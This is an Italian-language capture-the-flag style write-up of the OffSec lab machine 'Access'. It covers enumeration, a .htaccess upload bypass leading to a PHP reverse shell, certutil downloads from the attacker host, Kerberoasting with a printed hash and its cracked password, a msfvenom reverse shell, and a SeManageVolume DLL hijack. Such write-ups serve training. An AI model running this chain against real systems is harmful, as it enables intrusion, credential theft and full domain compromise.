Access
Network
- Ip Target:
192.168.212.187
Enumeration
| Port | Service | Version | Note |
|---|---|---|---|
| 53/tcp | domain | DNS | |
| 80/tcp | http | HTTP | |
| 88/tcp | kerberos-sec | KERBEROS | |
| 135/tcp | msrpc | MSRCP | |
| 139/tcp | netbios-ssn | SMB | |
| 389/tcp | ldap | LDAP | |
| 445/tcp | microsoft-ds | SMB | |
| 464/tcp | kpasswd5 | ||
| 593/tcp | http-rpc-epmap | MSRCP | |
| 636/tcp | ldapssl | LDAP | |
| 3268/tcp | globalcatLDAP | LDAP | |
| 3269/tcp | globalcatLDAPssl | LDAP | |
| 5985/tcp | wsman | OMI | |
| 9389/tcp | adws |
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.212.187
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 14:09 CET
Nmap scan report for 192.168.212.187
Host is up (0.068s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49704/tcp open unknown
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo nmap -Pn -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN alltcp.txt 192.168.212.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 14:14 CET
Nmap scan report for 192.168.212.187
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Access The Event
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-29 13:15:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-29T13:15:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo feroxbuster -u http://192.168.212.187 -w /usr/share/dirb/wordlists/big.txt
[...]
[####################] - 36s 20469/20469 574/s http://192.168.212.187/
[####################] - 0s 20469/20469 115644/s http://192.168.212.187/assets/vendor/php-email-form/ => Directory listing
[####################] - 0s 20469/20469 46205/s http://192.168.212.187/assets/vendor/swiper/ => Directory listing
[####################] - 1s 20469/20469 14876/s http://192.168.212.187/assets/img/speakers/ => Directory listing
[####################] - 0s 20469/20469 146207/s http://192.168.212.187/forms/ => Directory listing
[####################] - 1s 20469/20469 16467/s http://192.168.212.187/assets/img/hotels/ => Directory listing
[####################] - 0s 20469/20469 61284/s http://192.168.212.187/assets/css/ => Directory listing
[####################] - 0s 20469/20469 71321/s http://192.168.212.187/assets/vendor/glightbox/ => Directory listing
[####################] - 0s 20469/20469 77242/s http://192.168.212.187/assets/vendor/ => Directory listing
[####################] - 0s 20469/20469 191299/s http://192.168.212.187/assets/ => Directory listing
[####################] - 2s 20469/20469 9932/s http://192.168.212.187/assets/img/ => Directory listing
[####################] - 0s 20469/20469 117638/s http://192.168.212.187/assets/js/ => Directory listing
[####################] - 2s 20469/20469 13096/s http://192.168.212.187/assets/img/venue-gallery/ => Directory listing
[####################] - 0s 20469/20469 103379/s http://192.168.212.187/assets/vendor/aos/ => Directory listing
[####################] - 1s 20469/20469 14854/s http://192.168.212.187/assets/img/gallery/ => Directory listing
[####################] - 0s 20469/20469 53444/s http://192.168.212.187/assets/img/supporters/ => Directory listing
[####################] - 1s 20469/20469 34990/s http://192.168.212.187/assets/vendor/bootstrap/ => Directory listing
[####################] - 35s 20469/20469 592/s http://192.168.212.187/assets/vendor/bootstrap-icons/
[####################] - 34s 20469/20469 599/s http://192.168.212.187/cgi-bin/
[####################] - 0s 20469/20469 284292/s http://192.168.212.187/uploads/ => Directory listing
Port 80
Port 5985
Exploit
Non risulta essere possibile caricare file di tipo php tramite il form di acquisto dei ticket:
Provo a modificare il file .htaccess per permettere l'esecuzione di un file, con estensione custom suca, come fosse php.
Creo prima il file .htaccess:
E lo carico tramite il form:
A questo punto rinomino il file reverse_shell.php in reverse_shell.suca:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ mv reverse_shell.php reverse_shell.suca
Apro un listener sulla porta 4455 e carico il file .suca con esito positivo. Questo viene mostrato nel percorso http://192.168.212.187/uploads/ precedentemente individuato con Feroxbuster:
Cliccando sul file viene aperta la shell sul listener in ascolto:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.212.187] 50007
SOCKET: Shell has connected! PID: 1668
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami
access\svc_apache
Privilege Escalation
Carico ed eseguo winPEASany.exe
Importo i file utili:
Bash
PS C:\xampp\htdocs\uploads> certutil -urlcache -split -f http://192.168.45.248:8080/wintools.zip
Verifico se esistono degli SPN da abusare:
PowerShell
PS C:\xampp\htdocs\uploads> setspn -T access.offsec -Q */*
Checking domain DC=access,DC=offsec
CN=SERVER,OU=Domain Controllers,DC=access,DC=offsec
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/SERVER.access.offsec
ldap/SERVER.access.offsec/ForestDnsZones.access.offsec
ldap/SERVER.access.offsec/DomainDnsZones.access.offsec
DNS/SERVER.access.offsec
GC/SERVER.access.offsec/access.offsec
RestrictedKrbHost/SERVER.access.offsec
RestrictedKrbHost/SERVER
RPC/20dae709-54fe-40ec-8c68-4475793b542a._msdcs.access.offsec
HOST/SERVER/ACCESS
HOST/SERVER.access.offsec/ACCESS
HOST/SERVER
HOST/SERVER.access.offsec
HOST/SERVER.access.offsec/access.offsec
E3514235-4B06-11D1-AB04-00C04FC2DCD2/20dae709-54fe-40ec-8c68-4475793b542a/access.offsec
ldap/SERVER/ACCESS
ldap/20dae709-54fe-40ec-8c68-4475793b542a._msdcs.access.offsec
ldap/SERVER.access.offsec/ACCESS
ldap/SERVER
ldap/SERVER.access.offsec
ldap/SERVER.access.offsec/access.offsec
CN=krbtgt,CN=Users,DC=access,DC=offsec
kadmin/changepw
CN=MSSQL,CN=Users,DC=access,DC=offsec
MSSQLSvc/DC.access.offsec
Existing SPN found!
Utilizzo Rubeus per recuperare eventuali hash:
PowerShell
PS C:\xampp\htdocs\uploads\wintools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\uploads\wintools\hashes.kerberoast
[*] Roasted hashes written to : C:\xampp\htdocs\uploads\wintools\hashes.kerberoast
Porto il file sulla macchina kali e verifico il tipo di hash:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ cat hashes.kerberoast
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$6C0BD6F011609F3576C38C16D3F6C3F9$BFB2C2829BEA5F8B6942E5BAC9D0E5FC96637E9A4AB011B69DBC1DEE1D4E4E7F085A1B37F69CC4D635D9C32EE4B9809A7087596A2508D2CF56374701E9F424240D004FCCA6E9D104C756816C9A451B4D218837AD3E2D07F60F8B80B424A5262C12B9A208D5DA27F9CA90CA970DF8F665A1EB0130BFAC811A65D89FE2369B5CBDFEC92A282C59D4E552FFB7CF416ADF03775C30CBB5AF3FEF64413CA057DCC478ADD83C7EAE9E840C069E42E9A7CB362A4C6A26103085A1F2D19790F2554FEAEBF37C8C4E27BC23B24D54037AA388CED9653DDA3DE5CF89D69B491BBB5D27F8D44BB1D7C062E0D540767B46CB6DE2FF7FCE7EF8085B734AB88FD30E2AFD96B8877CE9A35F879ABF8CC537265952C242CB4249FA911C5879E953756219ACFD01D31F0CD596295867350B6A70D3E0E4B37AE6195EC50CDF5B54FAF0F6BA06903911D48E112D9428095C648355A3C578C2C08FD18AC88E46B35064810171581409D325B594297BF87BDDA9E8ED2290B3A51FD02289C212DF73D1EA1DD23B9981983C808F2BC9AE38AA2F127A8FD09E2B366288116EE9B55E0EC2B2AE80A570A09DD50FBC69342CDCE8E0756A03748CD58E8EBDB15346972F6495E60657AB490BE66285B0586DF8F42588AE37486ADBACD9D234FB3E4A3533A51279A30EDAC0B746B201FDFA5A861A12D0761740B33A5051AC6C2108B32467888CD9EC6C9A0A829BC9BF1643EC0349D1D156F3C46276B2A97986BA6A38894CD380F9E3D68A52CEA408B005B8362BE3E91C4D9CB1702EBD15EF584A00B0CD38D099725732AFFB45BF3B4A1949E5CED368B63D1D78398BAE78F285DE3EF62AC059BD39BF65BE6EC2A20EDFAD64B56E5B8125E526B6B01F6C8D768B63224445518D65F1E8D3897D996B4B14E6339A758C3827909C00CD19DDE1A3ABB90D2776FF17B64482ADF6FF73E0C7BEC5C44A2A618BE3D63ACCC8647BF10E80C04BD24EA0663710E8C8544670D9408FE0EB90E6C64E3B607F914A093D304909132B2D966721CBA8C3B25D35EB2ECCD229DF467CB1B2E54F4926E2F53B833E7924F4646CCD7E39511AE310E410F8F38D6948ACB118E9D7318E5B935E20130B637295DC572BD8A8BD67B011BAF5668E30FE3FF2DB8B929789E33661180B8E8EBF6FCDDE44DBA8C796A71BD13999354089E2D5618FD9E8938F8F6B997F869D009A5401F23E2DE9D3610DE43602DBAC6C1715A735E255791BD67A93B1C4A198FF44F8E3BDB9E0D37CC1E63EFEE2C2D522FF8C17A4DE4D86B245B9ACEFB8C65407F386C2907232AA07984D0EEC7CC41C2FFC63D41880E23B75FFBFE10450E9063686EB31EDE562F8BCEE6ADEF96DE50373897242D830A52644CE8412C3FD2BA065B45DF0DBB25CAB7842FC5C31BA192909DE4EB5D0F98A9FB2364B1CAB61463894588FDF33350FBDBC2D7D75DB1E2B2306A348FC9B837934896977B73D8E0BD24E5B3A4332CBA7409B075E60382D7EBDFE6242EADDB77FDA946902A28A637EA834D2A22EAD9097C942CE3F899A84C2A8481D944A5FA73DF97D08C267390BD48334BCE7E3B725D55FB21BD45371DF9561568FC9586DAA00FAAC756ED585EE66759D5CCD
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
Procedo al crack dell'hash con hashcat:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Viene trovata la password trustno1 per l'utente svc_mssql.
Non è possibile connettersi con Evil-WinRM:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ evil-winrm -i 192.168.212.187 -u svc_mssql -p 'trustno1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
E non sono disponibili info utili su samba:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ crackmapexec smb 192.168.212.187 -u 'svc_mssql' -p 'trustno1' --shares
SMB 192.168.212.187 445 SERVER [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVER) (domain:access.offsec) (signing:True) (SMBv1:False)
SMB 192.168.212.187 445 SERVER [+] access.offsec\svc_mssql:trustno1
SMB 192.168.212.187 445 SERVER [+] Enumerated shares
SMB 192.168.212.187 445 SERVER Share Permissions Remark
SMB 192.168.212.187 445 SERVER ----- ----------- ------
SMB 192.168.212.187 445 SERVER ADMIN$ Remote Admin
SMB 192.168.212.187 445 SERVER C$ Default share
SMB 192.168.212.187 445 SERVER IPC$ READ Remote IPC
SMB 192.168.212.187 445 SERVER NETLOGON READ Logon server share
SMB 192.168.212.187 445 SERVER SYSVOL READ Logon server share
A questo punto verifico se posso utilizzare RunAs:
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
PowerShell
C:\xampp\htdocs\uploads>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> Import-Module .\Invoke-RunasCs.ps1
PS C:\xampp\htdocs\uploads> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
access\svc_mssql
Apro un listener sulla porta 4477, creo un eseguibile con msfvenom e lo carico sulla macchina target:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=4477 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
Lo eseguo come svc_mssql:
PowerShell
PS C:\xampp\htdocs\uploads> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "reverse.exe"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
No output received from the process.
E si apre la shell sulla porta 4477:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ nc -nvlp 4477
listening on [any] 4477 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.212.187] 50715
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
C:\Windows\system32>
Recupero la flag local.txt:
Verifico i privilegi:
PowerShell
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Provo a sfruttare il privilegio SeManageVolumePrivilege usando il tool SeManageVolumeExploit che consente, una volta eseguito di scrivere dentro C:\:
PowerShell
C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe
SeManageVolumeExploit.exe
Entries changed: 929
DONE
C:\xampp\htdocs\uploads>echo "suca" > c:\suca.txt
echo "suca" > c:\suca.txt
C:\xampp\htdocs\uploads>type c:\suca.txt
type c:\suca.txt
"suca"
Info
Un modo possibile per ottenere una shell da qui è scrivere una DLL personalizzata in C:\Windows\System32\wbem\tzres.dll e chiamare systeminfo per attivarla.
Creo la DLL avelenata:
Carico la DLL dentro la cartella C:\Windows\System32\wbem\, sostituendo l'orgininale, apro un listener sulla porta 4488 e invoco systeminfo:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Access]
└─$ nc -nvlp 4488
listening on [any] 4488 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.212.187] 51066
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
Recupero la flag proof.txt:
